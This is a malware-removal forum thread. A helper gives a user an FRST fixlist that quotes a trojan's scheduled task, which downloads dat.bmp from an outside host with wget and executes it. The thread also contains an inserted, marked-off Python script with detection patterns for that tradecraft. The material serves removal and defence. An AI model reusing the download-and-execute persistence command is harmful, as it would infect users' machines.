Request to detect a virus


(Lkvfnovbniosn) #1

For some time my laptop has occasionally been freezing for a few seconds, and it sometimes "thinks" for no reason. After a scan, ESET detects nothing, but Emergency Kit detected: C:\ProgramData\dat.bmp     Detected: Trojan.GenericKD.2115200 (B)

After deletion, the dat.bmp file comes back.

http://www.wklej.org/id/1723300/

http://www.wklej.org/id/1723298/


(Acorus) #2

Open the system Notepad and paste:

Task: {4FA7A903-703A-4763-8353-B3CCE6BB706C} - System32\Tasks\SYSTEM = cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=vhGlVIjxXN;AcrobatPro_11_Web_WWMUI.exe;1424289424 & start cmd /R dat.bmp ==== ATTENTION
HKU\S-1-5-21-2104228876-2350865772-4012445646-1000\...\Run: [] = [X]
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - DefaultScope {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {30C2C443-1959-4395-84AE-59B78A25EA85} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {3EF164B4-6896-48F3-B0F4-860ECCFA1660} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {45D7246C-7BEF-43CC-ABA4-5C09C802E3ED} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {AD76EB3A-BF21-4983-BEEF-A672A06F709F} URL = http://www.amazon.co.uk/gp/search?ie=UTF8&keywords={searchTerms}&tag=tochibauk-win7-ie-search-21&index=blended&linkCode=ur2
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {CE95908F-8160-4595-B6F6-1DA44EC7B955} URL = http://www.amazon.co.uk/gp/search?ie=UTF8&keywords={searchTerms}&tag=tochibauk-win7-ie-search-21&index=blended&linkCode=ur2
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - DefaultScope {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {30C2C443-1959-4395-84AE-59B78A25EA85} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {45D7246C-7BEF-43CC-ABA4-5C09C802E3ED} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {AD76EB3A-BF21-4983-BEEF-A672A06F709F} URL = http://www.amazon.co.uk/gp/search?ie=UTF8&keywords={searchTerms}&tag=tochibauk-win7-ie-search-21&index=blended&linkCode=ur2
CHR Extension: (Bookmark Manager) - C:\Users\AP\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-04-15]
S3 Tosrfcom; No ImagePath
S3 andnetadb; System32\Drivers\lgandnetadb.sys [X]
S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
C:\ProgramData\wget.exe
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder.

Scan with Malwarebytes Anti-Malware http://www.malwarebytes.org/8/
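A defender-side triage of FRST "Task:" lines for the persistence pattern visible in the fix above (a ping used as a delay, a command-line downloader writing into ProgramData, and the downloaded "image" handed to cmd for execution), added here as an example and not part of this thread or of FRST; the sample lines, task GUIDs and download host are constructed placeholders.

```python
import re

# Constructed sample lines in the FRST "Task:" format. The GUIDs and the
# download host are placeholders, not the values from the original thread.
SAMPLE_LINES = [
    'Task: {00000000-0000-0000-0000-000000000001} - System32\\Tasks\\SYSTEM = '
    'cmd.exe /R cd "C:\\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & '
    'wget -t 0 --retry-connrefused -O dat.bmp http://downloader.invalid/dat.bmp?data=abc '
    '& start cmd /R dat.bmp',
    'Task: {00000000-0000-0000-0000-000000000002} - System32\\Tasks\\GoogleUpdateTaskMachineUA = '
    'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe [2015-01-10] (Google Inc.)',
]

# Indicators mirroring the tradecraft in the thread's scheduled task. Each one alone
# can be benign; several together on one task command line are worth a look.
INDICATORS = [
    ("ping-as-sleep", re.compile(r"\bping\s+\S+\s+-n\s+\d{2,}", re.I)),
    ("cli-downloader", re.compile(r"\b(wget|curl|certutil|bitsadmin)\b", re.I)),
    ("writes-programdata", re.compile(r"cd\s+\"?[A-Z]:\\ProgramData", re.I)),
    ("exec-nonexe-ext", re.compile(r"\bstart\s+cmd\s+/[RC]\s+\S+\.(bmp|jpg|png|gif|txt)\b", re.I)),
    ("chained-commands", re.compile(r"\s&\s")),
]

# FRST task line: "Task: {GUID} - <task path> = <command line>"
TASK_RE = re.compile(r"^Task:\s+\{(?P<guid>[0-9A-F-]+)\}\s+-\s+(?P<path>\S+)\s+=\s+(?P<cmd>.*)$", re.I)


def parse_task_line(line):
    """Return the GUID, task path and command line of an FRST task line, or None."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    return {"guid": m.group("guid"), "path": m.group("path"), "cmd": m.group("cmd")}


def score_task(task):
    """Names of the indicators that fire on the task's command line."""
    return [name for name, rx in INDICATORS if rx.search(task["cmd"])]


def triage(lines, threshold=2):
    """Tasks whose command line trips at least `threshold` indicators."""
    findings = []
    for line in lines:
        task = parse_task_line(line)
        if task is not None:
            hits = score_task(task)
            if len(hits) >= threshold:
                findings.append((task["path"], hits))
    return findings


if __name__ == "__main__":
    for path, hits in triage(SAMPLE_LINES):
        print(f"{path}: {', '.join(hits)}")
```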


(Lkvfnovbniosn) #3

Fix done. After scanning, it detected two viruses, which I removed.


(Acorus) #4

Delete the C:\FRST folder.